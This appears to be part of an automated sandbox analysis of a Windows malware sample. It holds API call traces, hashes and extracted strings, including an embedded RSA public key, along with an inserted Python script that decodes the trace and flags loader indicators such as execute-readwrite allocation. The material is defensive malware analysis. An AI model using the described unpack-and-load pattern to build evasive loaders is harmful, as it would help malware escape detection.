• Instruction Fuzzy Hash: BE610CB4E00209EFDF04CF94D895AAEBBB1BF48314F118169E905AB345D374E981CFA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00496B66
Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
• Instruction ID: b692662554fdf5fb19ff4b9827adedce19166edc5e3a8710521df6bbd06d5aa6
• Opcode Fuzzy Hash: b5d0f8a1bf7b2038cbd8864f2d305bb74c0e3a40d9f062a4762629741d53013d
• Instruction Fuzzy Hash: 7141A674A0421ADFCF08CF88C890BBEBBB1FF48304F258569E515AB395D734A941CB95
Uniqueness

Uniqueness Score: -1.00%
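Read together, the API lines of the three functions above (CreateFileA with GENERIC_READ and OPEN_EXISTING, a PAGE_READWRITE VirtualAlloc, ReadFile, a second VirtualAlloc with flProtect 0x40, then VirtualProtect and LoadLibraryExA from the memory region at 0x495000) are the shape of a loader stub that reads a file into memory and prepares it for execution, which is what the "Detected unpacking" signature in the overview refers to. The following is an added example, not part of the report: it parses lines in the report's own `Name.Module(args), ref: address` format, decodes the numeric arguments against the documented Win32 constants, and names the loader traits the sequence exhibits. `SAMPLE_TRACE` copies the API lines of the three functions into one list for illustration; the report lists them per function, and treating them as one ordered trace is an assumption of this example.

```python
"""Decode a sandbox API trace and flag the read-file-into-executable-memory sequence."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The API lines from the three functions above, concatenated (constructed input).
SAMPLE_TRACE = """\
CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00495E7B
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00495EB2
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00495EEB
FindCloseChangeNotification.KERNELBASE(?), ref: 00495F04
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00495F41
VirtualProtect.KERNELBASE(00000000,00000000,?,?), ref: 00496A0E
LoadLibraryExA.KERNELBASE(00000000,00000000,00000000), ref: 00496B66
"""

API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Win32 constants from winnt.h / fileapi.h; each table is decoded bitwise
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_FLAGS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
              0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_FLAGS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
PAGE_EXECUTE_ANY = 0xF0   # mask covering the four PAGE_EXECUTE* values

@dataclass
class Call:
    name: str
    module: str
    args: List[Optional[int]]   # None where the trace shows '?' (argument not recovered)
    ref: int

def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        args = [None if a.strip() == "?" else int(a, 16)
                for a in m.group("args").split(",") if a.strip()]
        calls.append(Call(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

def decode_flags(value: Optional[int], table: Dict[int, str]) -> str:
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)   # bits the table does not know about
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "0"

def describe(call: Call) -> str:
    a = call.args
    if call.name == "VirtualAlloc" and len(a) == 4:
        return (f"{call.ref:08X} VirtualAlloc type={decode_flags(a[2], MEM_FLAGS)} "
                f"protect={decode_flags(a[3], PAGE_FLAGS)}")
    if call.name == "VirtualProtect" and len(a) == 4:
        return f"{call.ref:08X} VirtualProtect newprotect={decode_flags(a[2], PAGE_FLAGS)}"
    if call.name in ("CreateFileA", "CreateFileW") and len(a) == 7:
        disp = DISPOSITION.get(a[4], "?") if a[4] is not None else "?"
        return (f"{call.ref:08X} {call.name} access={decode_flags(a[1], ACCESS_FLAGS)} "
                f"share={decode_flags(a[2], SHARE_FLAGS)} disposition={disp}")
    return f"{call.ref:08X} {call.name}"

def loader_indicators(calls: List[Call]) -> List[str]:
    """Name the manual-loader traits present, in the order the trace establishes them."""
    found: List[str] = []
    seen_open = seen_read = False
    for c in calls:
        if c.name in ("CreateFileA", "CreateFileW"):
            seen_open = True
        elif c.name == "ReadFile" and seen_open:
            seen_read = True
        elif (c.name == "VirtualAlloc" and len(c.args) == 4
              and c.args[3] is not None and c.args[3] & PAGE_EXECUTE_ANY):
            found.append("rwx-allocation" if c.args[3] & 0x40 else "executable-allocation")
            if seen_read and "file-read-then-exec-alloc" not in found:
                found.append("file-read-then-exec-alloc")
        elif c.name == "VirtualProtect":
            found.append("protection-change")
        elif c.name.startswith("LoadLibrary"):
            found.append("dynamic-library-load")
    return found

if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    for c in trace:
        print(describe(c))
    print("indicators:", loader_indicators(trace))
```

The arguments shown as `?` in the trace are kept as `None` rather than guessed, so the VirtualProtect line decodes to an unknown new protection; the 0x40 on the second VirtualAlloc is the one value here that is fully recovered and is the PAGE_EXECUTE_READWRITE allocation that the unpacking signature keys on.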

APIs
• RtlExitUserProcess.NTDLL(00000000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00495FDC
Memory Dump Source
• Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExitProcessUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3902816426-0
                                                                                                                                                • Opcode ID: ed4079702a49fbbd7f3e6e9966e09eaea25f58def5707f05d86400b04c106375
                                                                                                                                                • Instruction ID: 09d0a76cf425fa79ed9f89c51127b5e7e730523a7ddbbdbd5452570a5d42e12b
                                                                                                                                                • Opcode Fuzzy Hash: ed4079702a49fbbd7f3e6e9966e09eaea25f58def5707f05d86400b04c106375
                                                                                                                                                • Instruction Fuzzy Hash: 3501EDB2E00118AFDF64DBA4DC51FEAB379AF4D304F0085E9B60DA6241DA355E80CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(00001000,00000000,00001000,00000004,?,004964F6,?,?), ref: 00496873
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                • Instruction ID: 0c79c16543167986a93a92f931b952afb032c984907d65328680b433e07df2ac
                                                                                                                                                • Opcode Fuzzy Hash: 06d134ac31ed49927b0023594b9de14bb7f4387dc246311e3687aa03bac033bc
                                                                                                                                                • Instruction Fuzzy Hash: 8141BBB4E00209DFCB08CF84C990AAEB7B5BF88304F218599E915AB355D735EE51CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004964A9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 9cb46efddb22f13334e8a9b75164fb4080135cd7d7fdece749b04495215ba953
                                                                                                                                                • Instruction ID: 83fc7aca7995ced2d13b36fa05aea382624067eaeceb46ea016a2c7075335e90
                                                                                                                                                • Opcode Fuzzy Hash: 9cb46efddb22f13334e8a9b75164fb4080135cd7d7fdece749b04495215ba953
                                                                                                                                                • Instruction Fuzzy Hash: 882119B5E00109AFCF04CFA4D891DAEBBB5BF88314F1181A9EA04AB345D635E941CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004964A9
                                                                                                                                                  • Part of subcall function 004967AF: VirtualAlloc.KERNELBASE(00001000,00000000,00001000,00000004,?,004964F6,?,?), ref: 00496873
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: a48b14e0d67def59de494df9450b26c235f79b4bd1f42c1a9e5b8037933ecf93
                                                                                                                                                • Instruction ID: e3c49596b105349c375f5a8fda8ca4edc49443407a8a1a9de2d9e69037e30244
                                                                                                                                                • Opcode Fuzzy Hash: a48b14e0d67def59de494df9450b26c235f79b4bd1f42c1a9e5b8037933ecf93
                                                                                                                                                • Instruction Fuzzy Hash: 9F2171B5E00109AFCF40CFE4D891DAEBBB5BF8C314F118299E914A7345D638E942CBA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000004,?,?,00496383,WorkIn,00000000,?,?,?,?), ref: 00496413
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,0000001C,00003000,00000004,?,?,00496383,WorkIn,00000000), ref: 0049644D
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004964A9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                • Opcode ID: 802be24639beb6097a8b506a0a1b11d72c9be6878d2412fb9918f3aa228db220
                                                                                                                                                • Instruction ID: e8e3e5f25cd71a06307a66e1c40e84d6942a56d6c4222ec9d3207b11ecfa1e68
                                                                                                                                                • Opcode Fuzzy Hash: 802be24639beb6097a8b506a0a1b11d72c9be6878d2412fb9918f3aa228db220
                                                                                                                                                • Instruction Fuzzy Hash: DFE01A70D0020DAFEF10CEE1D409BAF7BB0AB48715F00C06AE9026A280C27849519F26
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Non-executed Functions

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL,185A3E5D,?,?,00000001,?,0043F744), ref: 00456105
                                                                                                                                                • LoadLibraryA.KERNEL32(KERNEL32.DLL,?,?,00000001,?,0043F744), ref: 0045610F
                                                                                                                                                • LoadLibraryA.KERNEL32(NETAPI32.DLL,?,?,00000001,?,0043F744), ref: 0045611B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 0045613E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 00456149
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000001,?,0043F744), ref: 004561E2
                                                                                                                                                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 004561F7
                                                                                                                                                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00456202
                                                                                                                                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0045620D
                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000001,?,0043F744), ref: 004562F3
                                                                                                                                                • GetVersion.KERNEL32(?,?,00000001,?,0043F744), ref: 004562F9
                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,?,?,00000001,?,0043F744), ref: 00456318
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 0045632E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCursorInfo), ref: 00456339
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetQueueStatus), ref: 00456344
                                                                                                                                                • GetVersion.KERNEL32(?,?,00000001,?,0043F744), ref: 00456378
                                                                                                                                                • GetVersion.KERNEL32(?,?,00000001,?,0043F744), ref: 00456385
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000001,?,0043F744), ref: 004563F9
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00456414
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0045641E
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00456429
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00456434
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0045643F
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0045644A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00456455
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00456460
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0045646B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00456476
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00456481
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0045648C
• GetTickCount.KERNEL32 ref: 00456528
• GetTickCount.KERNEL32 ref: 0045660E
• GetTickCount.KERNEL32 ref: 00456660
• GetTickCount.KERNEL32 ref: 0045668A
• GetTickCount.KERNEL32 ref: 004566E8
• GetTickCount.KERNEL32 ref: 0045670A
• GetTickCount.KERNEL32 ref: 0045676C
• GetTickCount.KERNEL32 ref: 00456787
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$CountTick$Library$Load$FreeVersion
• String ID: ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
• API String ID: 1087946788-2556708411
• Opcode ID: 9fe23b561ca91406333ee38a62108d9db0617adee58660e7e6143efbcb595282
• Instruction ID: 57a1450b2fc923af4d97f76896b3bd8946af58d7ad92491ed6776b3b257cdbec
• Opcode Fuzzy Hash: 9fe23b561ca91406333ee38a62108d9db0617adee58660e7e6143efbcb595282
• Instruction Fuzzy Hash: DB327370D002189BDF10EFE5DC85BEEBBB8FF08705F51416AE905A7282DB789944CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ___getlocaleinfo
• String ID:
• API String ID: 1937885557-0
• Opcode ID: 8d616f1f61380d85d2a5857ca11f2a7ffc32f5a42b27233d85adefce8a41491e
• Instruction ID: b47b2687838c0f32e0724138ee110684e2ab6b631e6618b371d3e3f876cfcd4b
• Opcode Fuzzy Hash: 8d616f1f61380d85d2a5857ca11f2a7ffc32f5a42b27233d85adefce8a41491e
• Instruction Fuzzy Hash: DBE1E2B290020DBEEF11DAF1CD85DFF7BBDEB04748F04092AB355D2141EA75AA099764
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041B166
• _memset.LIBCMT ref: 0041B1CE
• LoadLibraryW.KERNEL32(userenv.dll), ref: 0041B1FE
• GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0041B217
• GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041B223
• CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000030,?,00000000,00000044,00000000), ref: 0041B25F
• CloseHandle.KERNEL32(00000000), ref: 0041B26F
• CloseHandle.KERNEL32(?), ref: 0041B27D
• FreeLibrary.KERNEL32(?), ref: 0041B296
• CloseHandle.KERNEL32(?), ref: 0041B2A4
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CloseHandle$AddressLibraryProc$CreateFreeH_prologLoadProcessUser_memset
• String ID: "%s" %s$0$CreateEnvironmentBlock$D$DestroyEnvironmentBlock$userenv.dll$|P
• API String ID: 1615916502-1693829574
• Opcode ID: dc44699519551521a02e1f7afd78f6c1ab08d25c90df6f1015458facb40e5ad0
• Instruction ID: ddf75ef95b9bfa407689728afd416bfbd2e9170abf5b722496d8987d0478cdaf
• Opcode Fuzzy Hash: dc44699519551521a02e1f7afd78f6c1ab08d25c90df6f1015458facb40e5ad0
• Instruction Fuzzy Hash: 78412871C00109EFDF119FA5DD85AEEBBBAFF08345B24802AE505B6251D7399E44CBA8
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: ./\
• API String ID: 0-3176372042
• Opcode ID: 89969cbcba66b1a890d39cb7e6bf5d987a0a5ec44a70bcdebff5a03e4d31018a
• Instruction ID: b34a3abf89ba8b54027160294b75f095ec42f9710c156fd9d2ac31434d017dcc
• Opcode Fuzzy Hash: 89969cbcba66b1a890d39cb7e6bf5d987a0a5ec44a70bcdebff5a03e4d31018a
• Instruction Fuzzy Hash: D6A1A4B5C00619AEDB60EFA5CD44EAEB7F8BF08311B10412FF419E7641E7B89940CB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 00412C38
• GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process), ref: 00412C50
• GetProcAddress.KERNEL32(00000000), ref: 00412C53
• _memset.LIBCMT ref: 00412C92
• GetVersionExW.KERNEL32(0000011C), ref: 00412CA1
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00412D27
• GetProcAddress.KERNEL32(00000000), ref: 00412D2A
• GetSystemInfo.KERNEL32(00000000), ref: 00412D3A
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc$CurrentInfoProcessSystemVersion_memset
• String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
• API String ID: 558052023-3073145729
• Opcode ID: 23d6fbb350604dc7212e297aebc434d0d5c7eb109188bb6bd2bb609c01d4a731
• Instruction ID: d3164b67d64a1ba022f1cdfd4cb0083e574330498a52c7d27fbd05e85a333baa
• Opcode Fuzzy Hash: 23d6fbb350604dc7212e297aebc434d0d5c7eb109188bb6bd2bb609c01d4a731
• Instruction Fuzzy Hash: 6A41C3719003099BDB20CF65EA44BFEB7F4AF14305F20481AE646E2290E7BCDAD5DB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• _fprintf.LIBCMT ref: 004128A4
• _fprintf.LIBCMT ref: 00412902
• _strlen.LIBCMT ref: 0041291D
  • Part of subcall function 00412996: _malloc.LIBCMT ref: 004129F8
  • Part of subcall function 00412996: _printf.LIBCMT ref: 00412A0C
  • Part of subcall function 00412996: _memset.LIBCMT ref: 00412A1C
  • Part of subcall function 00412996: _memset.LIBCMT ref: 00412A41
  • Part of subcall function 00412996: _strrchr.LIBCMT ref: 00412A5A
• _strlen.LIBCMT ref: 0041292E
• _malloc.LIBCMT ref: 0041293C
  • Part of subcall function 0048E3A3: __FF_MSGBANNER.LIBCMT ref: 0048E3C6
  • Part of subcall function 0048E3A3: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004994D0,0049AF7A,00000001,00000001,00499DC5,00000018,00500298,0000000C,00499E54,00000001), ref: 0048E41B
• _fprintf.LIBCMT ref: 00412968
Strings
• Load Public Key Error!, xrefs: 00412896
• -----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLfprfltmOHTzR+m/YBEdzgxnHwXgNPal/ctcPxx2L3by8pqL9tpgSgEYEeIp+DMIOFvh0gY6/gt7hqXrairRK8XHrlfJJxucOxb54FThG8Apu+IsnhM3AKABV2b3P5PeloDtfi8E0TdADPHr0kgcvS7YUOm7Z/hoSXkJsrwXBOQIDAQAB-----END PUBL, xrefs: 0041287F
• Failed to decrypt., xrefs: 0041295A
• %s%s%s, xrefs: 004128F4
• load public key failed[, xrefs: 004128EF
Memory Dump Source
